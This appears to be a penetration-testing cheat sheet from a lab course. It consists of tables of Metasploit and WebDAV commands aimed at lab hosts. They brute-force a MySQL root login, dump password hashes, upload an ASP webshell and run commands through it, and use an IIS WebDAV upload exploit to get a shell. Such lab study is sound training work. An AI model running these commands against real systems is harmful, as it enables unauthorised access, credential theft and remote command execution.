Web Application Pentesting

Web Enumeration - Metasploit

| Command | Description |
|---|---|
| `use auxiliary/scanner/http/apache_userdir_enum` | Enumerate Apache userdir |
| `use auxiliary/scanner/http/brute_dirs` | Enumerate directories |
| `use auxiliary/scanner/http/dir_scanner` | Enumerate directories (part 2) |
| `use auxiliary/scanner/http/http_version` | Apache version |
| `use auxiliary/scanner/http/robots_txt` | View robots.txt |
| `use auxiliary/scanner/http/http_header` | View the response headers |
| `use auxiliary/scanner/http/files_dir` <br> `set RHOSTS victim-1` <br> `set VERBOSE false` <br> `run` | List files in a directory |
| `use auxiliary/scanner/http/http_put` <br> `set RHOSTS victim-1` <br> `set PATH /data` <br> `set FILENAME test.txt` <br> `set FILEDATA "Welcome To AttackDefense"` <br> `run` | Check whether a file can be uploaded |
| `use auxiliary/scanner/http/http_put` <br> `set RHOSTS victim-1` <br> `set PATH /data` <br> `set FILENAME test.txt` <br> `set ACTION DELETE` <br> `run` | Delete a file |
| `use auxiliary/scanner/http/http_login` <br> `set RHOSTS victim-1` <br> `set AUTH_URI /secure/` <br> `set VERBOSE false` <br> `run` | Attempt to log in |
| `use auxiliary/scanner/http/apache_userdir_enum` <br> `set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt` <br> `set RHOSTS victim-1` <br> `set VERBOSE false` <br> `run` | Enumerate Apache users |


MySQL - Metasploit

| Command | Description |
|---|---|
| `use auxiliary/scanner/mysql/mysql_version` | View the version |
| `use auxiliary/scanner/mysql/mysql_login` <br> `set RHOSTS demo.ine.local` <br> `set USERNAME root` <br> `set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt` <br> `set VERBOSE false` <br> `run` | Brute-force login |
| `use auxiliary/admin/mysql/mysql_enum` <br> `set USERNAME root` <br> `set PASSWORD twinkle` <br> `set RHOSTS demo.ine.local` <br> `run` | Enumerate MySQL |
| `use auxiliary/admin/mysql/mysql_sql` <br> `set USERNAME root` <br> `set PASSWORD twinkle` <br> `set RHOSTS demo.ine.local` <br> `run` | Enumerate the Linux host running MySQL |
| `use auxiliary/scanner/mysql/mysql_file_enum` <br> `set USERNAME root` <br> `set PASSWORD twinkle` <br> `set RHOSTS demo.ine.local` <br> `set FILE_LIST /usr/share/metasploit-framework/data/wordlists/directory.txt` <br> `set VERBOSE true` <br> `run` | List files |
| `use auxiliary/scanner/mysql/mysql_hashdump` <br> `set USERNAME root` <br> `set PASSWORD twinkle` <br> `set RHOSTS demo.ine.local` <br> `run` | Dump all password hashes |
| `use auxiliary/scanner/mysql/mysql_schemadump` <br> `set USERNAME root` <br> `set PASSWORD twinkle` <br> `set RHOSTS demo.ine.local` <br> `run` | Find table names |
| `use auxiliary/scanner/mysql/mysql_writable_dirs` <br> `set RHOSTS demo.ine.local` <br> `set USERNAME root` <br> `set PASSWORD twinkle` <br> `set DIR_LIST /usr/share/metasploit-framework/data/wordlists/directory.txt` <br> `run` | Find which directories are writable |


WebDAV - DavTest

| Command | Description |
|---|---|
| `nmap --script http-enum -sV -p80 demo.ine.local` | Enumerate directories |
| | Run DavTest |
| `davtest -auth bob:password_123321 -url http://demo.ine.local/webdav` | Run DavTest with credentials |

WebDAV - Cadaver

| Command | Description |
|---|---|
| `put /usr/share/webshells/asp/webshell.asp` <br> `ls` | Upload the file (DavTest told us which file type can be uploaded) |
| `demo.ine.local/webdav/webshell.asp` | Open the file |
| whoami: `http://demo.ine.local/webdav/webshell.asp?cmd=whoami` <br> List C:\: `http://demo.ine.local/webdav/webshell.asp?cmd=dir+C%3A%5C` | Execute commands |
| `http://demo.ine.local/webdav/webshell.asp?cmd=type+C%3A%5Cflag.txt` | Read the flag |
| | Create a shell |

WebDAV - Metasploit

| Command | Description |
|---|---|
| `msfconsole -q` <br> `use exploit/windows/iis/iis_webdav_upload_asp` <br> `set RHOSTS demo.ine.local` <br> `set HttpUsername bob` <br> `set HttpPassword password_123321` <br> `set PATH /webdav/metasploit%RAND%.asp` <br> `exploit` <br> `shell` | With DavTest we learn the URL and which file types can be uploaded. The only difference is that here we use Metasploit instead of Cadaver. |